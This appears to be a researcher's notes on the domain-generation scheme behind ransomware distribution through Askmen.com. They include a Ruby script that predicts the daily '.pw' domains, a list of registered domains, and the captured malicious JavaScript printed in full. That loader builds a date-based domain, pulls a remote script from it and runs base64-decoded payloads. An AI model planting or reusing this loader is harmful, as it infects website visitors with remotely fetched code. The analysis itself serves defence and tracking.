Generated Domains Used In Askmen.com Ransomware Distribution http://threatglass.com/malicious_urls/8936

date_to_crc32_domain.rb

require 'zlib'
require 'date'

def gen_crc(date: date)
  str = [date.year, date.month, date.day].join("+=+")
  Zlib::crc32(str)
end

start_dt = Date.parse('2014-06-01')

end_dt = start_dt + 30

date_domains = (start_dt..end_dt).map do |dt|
  gen_str =  gen_crc(date: dt).to_s(16)
  [dt, gen_str + ".pw", "http://registry.pw/whois/?query=#{gen_str}&output=nice"]
end

puts date_domains.map{|dd| dd.join(",")}

registered_domains.txt

2014-06-18      9b66653c.pw     http://registry.pw/whois/?query=9b66653c&output=nice
2014-06-19      ec6155aa.pw     http://registry.pw/whois/?query=ec6155aa&output=nice
2014-06-20      be90becd.pw     http://registry.pw/whois/?query=be90becd&output=nice
2014-06-21      c9978e5b.pw     http://registry.pw/whois/?query=c9978e5b&output=nice
2014-06-22      509edfe1.pw     http://registry.pw/whois/?query=509edfe1&output=nice
2014-06-23      2799ef77.pw     http://registry.pw/whois/?query=2799ef77&output=nice

the_js.js

var wqqqqwqwqwqqqqwqq='qqwqwqqwwqwwwqqwwqwwqw';function crcTableG(){var c;var crcTable = [];for(var n =0; n < 256; n++){c = n;for(var k =0; k < 8; k++){c = ((c&1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));}crcTable[n] = c;}return crcTable;};function crc32(str) {var crcTable = crcTableG();var crc = 0 ^ (-1);for (var i = 0; i < str.length; i++ ) {crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];}return (crc ^ (-1)) >>> 0;};var d = "+=+";var date = new Date();var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth()+1) + d + date.getUTCDate();window.rctm=function(p){var s = document.createElement('SCRIPT'); s.text = b64dec(p).replace(/\0+/,''); document.body.appendChild(s);};var s = document.createElement('SCRIPT');s.src="http://" + crc32(dateStr).toString(16) + ".pw/nbe.html?"+Math.random();document.body.appendChild(s);